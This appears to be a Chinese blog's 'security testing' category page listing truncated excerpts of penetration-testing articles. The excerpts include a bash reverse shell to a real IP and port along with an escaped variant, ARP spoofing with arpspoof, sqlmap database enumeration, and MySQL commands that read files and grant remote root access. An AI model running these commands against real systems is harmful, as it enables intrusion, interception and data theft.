文章分类 - 安全测试
摘要:Some Linux Hacking Tricks There is always a method here is useful for you to penetrantion testing :) ## Some ways to read system files cat /etc/issue
阅读全文
摘要:我们在开发Kali Linux时的目标之一是提供多种元数据包,使我们能够根据他们的特殊需求轻松安装工具子集。直到最近,我们只有少数这些元软件包,但是我们已经扩展了元包列表以包含更多选项: kali-linux kali-linux-all kali-linux-forensic kali-linux
阅读全文
摘要:### 实例 arpspoof 和dsniff必须配合才可以成功截获同网关内的数据包 1.首先打开本机的路由转发功能 echo 1 > /proc/sys/net/ipv4/ip_forward 2.进行arp欺骗 #arpspoof -i wlan0 网卡接口 -t 指定一个进行arp欺骗的目标,
阅读全文
摘要:## 1.nmap功能介绍 * 1.主机存活检测* 2.端口探测* 3.服务识别* 4.操作系统识别* 5.硬件地址检测* 6.服务版本识别* 7.漏洞扫描,使用nmap自带脚本## 2.简单示例使用ping检测10.0.0.0/24这个网段 nmap -sP 10.0.0.0/24使用SYN的方法
阅读全文
摘要:ruby -e 'f=File.new("test.txt", "w") ;f.write("test") ' python -c "f=open('test.txt','a');f.write('line.')" python -c "with open('test.txt', 'a') as the_file:the_file.write('test')" perl -e &quo
阅读全文
摘要:bash: /bin/bash -i >& /dev/tcp/116.196.82.241/8888 0>&1echo '/bin/bash -i >& /dev/tcp/116.196.82.241/8888 0>&1' > /tmp/a.sh a=$'\057bin\057bash -i \07
阅读全文
摘要:### 是否降权 select load_file('c:\\boot.ini') ### 查看目录 select @@basedir ### 查询导入目录 SHOW VARIABLES LIKE '%plugin%'; ### 开启外链 GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT ...
阅读全文
摘要:sqlmap -u "http://url/news?id=1" --current-user #获取当前用户名称 sqlmap -u "http://www.xxoo.com/news?id=1" --current-db #获取当前数据库名称 sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name" #列表名 ...
阅读全文
摘要:/* Socket 1data transport tool * [bkbll@mobile socket]$ uname -a * Linux mobile 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux * [bkbll@mobile socket]$ gcc -o trtool trtool.c *...
阅读全文
浙公网安备 33010602011771号